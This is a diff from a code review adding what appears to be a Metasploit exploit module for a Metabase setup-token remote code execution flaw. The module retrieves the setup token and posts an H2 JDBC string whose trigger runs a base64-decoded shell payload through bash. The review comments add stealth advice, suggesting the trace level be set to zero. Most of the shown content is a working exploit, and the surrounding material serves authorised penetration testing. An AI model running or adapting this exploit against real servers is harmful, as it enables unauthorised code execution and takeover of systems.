modules/exploits/linux/http/metabase_setup_token_rce.rb

```diff
@@ -0,0 +1,157 @@
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    json = get_boostrab_json_blob_from_html_resp(res.body)
+    version = json.dig('version', 'tag')
+    return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?
+
+    # typically v0.46.6
+    version = version.gsub('v', '')
+
+    if Rex::Version.new(version) < Rex::Version.new('0.46.6.1')
+      return CheckCode::Appears("Version Detected: #{version}")
+    end
+
+    CheckCode::Safe("Version not vulnerable: #{version}")
+  end
+
+  def exploit
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+    json = get_boostrab_json_blob_from_html_resp(res.body)
+    setup_token = json['setup-token']
+    if setup_token.nil?
+      print_status('Setup token is nil, checking secondary location')
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, 'api', 'session', 'properties'),
+        'method' => 'GET'
+      )
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+      json = res.get_json_document
+      setup_token = json['setup-token']
+    end
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?
+    print_good("Found setup token: #{setup_token}")
+
+    print_status('Sending exploit')
+    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
+    b64_pe = ::Base64.strict_encode64(payload.encoded)
+    equals_count = b64_pe.count('=')
+    if equals_count > 0
+      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
+    end
+
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'setup', 'validate'),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => {
+        'token' => setup_token,
+        'details' =>
+          {
+            'is_on_demand' => false,
+            'is_full_sync' => false,
+            'is_sample' => false,
+            'cache_ttl' => nil,
+            'refingerprint' => false,
+            'auto_run_queries' => true,
+            'schedules' => {},
+            'details' =>
+              {
+                'db' => "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER #{Rex::Text.rand_text_alpha_upper(6..12)} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,#{b64_pe}}|{base64,-d}|{bash,-i}')\n$$--=x",
```

Comment:
According to the [documentation]( https://h2database.com/html/features.html ), you might want to set `TRACE_LEVEL_SYSTEM_OUT` to `0` for _extra stealth_. Also, I'm not sure the `MODE=MSSQLServer;` part is required, is it?

Reply:
`TRACE_LEVEL_SYSTEM_OUT` is required, but can be set to 0. `MODE` can be removed